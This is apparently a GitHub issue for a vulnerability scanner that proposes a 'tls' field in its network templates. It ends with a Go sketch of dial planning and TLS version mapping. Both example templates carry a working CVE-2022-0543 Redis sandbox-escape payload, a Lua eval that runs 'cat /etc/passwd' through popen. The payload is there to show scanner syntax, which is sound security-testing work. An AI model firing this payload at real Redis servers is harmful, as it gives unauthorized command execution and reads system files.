TLS related enhancements in network protocol #4431

Open
tarunKoyalwar opened this issue Nov 27, 2023 · 0 comments
Labels
Type: Discussion Some ideas need to be planned and discussed to come to a strategy. Type: Enhancement Most issues will probably ask for additions or changes.

Comments

@tarunKoyalwar
Member

Context

  • Introduction of the port field in the network protocol fixed an issue related to redundant dials to some hosts when the input contains 80,443 ports in the URL, and also reduced the warnings generated due to closed ports (ref: Input handling for network templates #3902)
  • But this change did not mitigate the issue completely when the service has a TLS and a non-TLS port, like the example below:
id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  tags: cve,cve2022,network,redis,unauth,rce,kev

tcp:
  - host:
      - "{{Hostname}}"
      - "tls://{{Hostname}}"
    port: 6379

    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

In this example two dials will be made: one to {{Hostname}}:6379 and the other to tls://{{Hostname}}:6379, which is not correct since the TLS port is 6380 and not 6379.
Adding two values in the port field like port: 6379,6380 will send a total of 4 dials to the host, which is also not correct.

Proposed Solution

  • The simplest solution seems to be adding a new field tls in the network protocol to specify TLS-related customization. The final network protocol will look like below:
id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  tags: cve,cve2022,network,redis,unauth,rce,kev

tcp:
  - host:
      - "{{Hostname}}"
    port: 6379

    tls:
      port: 6380
      version: tls12
      cipher-suites:
        - TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
        - TLS_AES_128_CCM_SHA256
      mode: ztls
      # other tls related customization from tlsx like client certificates etc

    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

This will work like a pitchfork, where the port field will be used for the non-TLS connection and the tls.port field will be used for the TLS connection.
The meaning of the port field will not change in this context, and it will also accept comma-separated values like port: 22,2222 as introduced in the recent release.

@tarunKoyalwar tarunKoyalwar added Type: Enhancement Most issues will probably ask for additions or changes. Type: Discussion Some ideas need to be planned and discussed to come to a strategy. labels Nov 27, 2023
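The dial expansion behind the pitchfork proposal, as an added Go example that is not nuclei's own code: it assumes port and tls.port are comma-separated strings as the issue describes, shows that a host with the legacy tls:// prefix still produces hosts x ports dials while the proposed tls.port field pairs only with plain hosts, and maps the version string onto crypto/tls constants, rejecting unknown values.

```go
package main

import (
	"crypto/tls"
	"fmt"
	"strings"
)

func splitPorts(s string) (out []string) {
	for _, p := range strings.Split(s, ",") {
		if p = strings.TrimSpace(p); p != "" {
			out = append(out, p)
		}
	}
	return out
}

// PlanDials lists the connections one tcp entry would open as "tcp://host:port" or
// "tls://host:port". A host already prefixed "tls://" keeps the legacy behaviour
// (TLS on every port, so hosts x ports dials); tlsPort is the proposed tls.port.
func PlanDials(hosts []string, port, tlsPort string) []string {
	var dials []string
	for _, h := range hosts {
		scheme, host := "tcp://", h
		if strings.HasPrefix(h, "tls://") { // legacy form: TLS on the same port list
			scheme, host = "tls://", strings.TrimPrefix(h, "tls://")
		}
		for _, p := range splitPorts(port) {
			dials = append(dials, scheme+host+":"+p)
		}
		if scheme == "tcp://" { // proposed tls.port pairs only with plain hosts
			for _, p := range splitPorts(tlsPort) {
				dials = append(dials, "tls://"+host+":"+p)
			}
		}
	}
	return dials
}

// TLSConfigFor maps the template's `version:` string onto crypto/tls constants and
// fails closed on unknown values instead of silently negotiating a default.
func TLSConfigFor(version, serverName string) (*tls.Config, error) {
	versions := map[string]uint16{"tls10": tls.VersionTLS10, "tls11": tls.VersionTLS11,
		"tls12": tls.VersionTLS12, "tls13": tls.VersionTLS13}
	v, ok := versions[version]
	if !ok {
		return nil, fmt.Errorf("unsupported tls version %q", version)
	}
	return &tls.Config{ServerName: serverName, MinVersion: v, MaxVersion: v}, nil
}
```

With the legacy template (hosts {{Hostname}} and tls://{{Hostname}}, port 6379,6380) PlanDials yields the four dials the issue complains about; with the proposed form (one host, port 6379, tls.port 6380) it yields exactly one plain and one TLS dial.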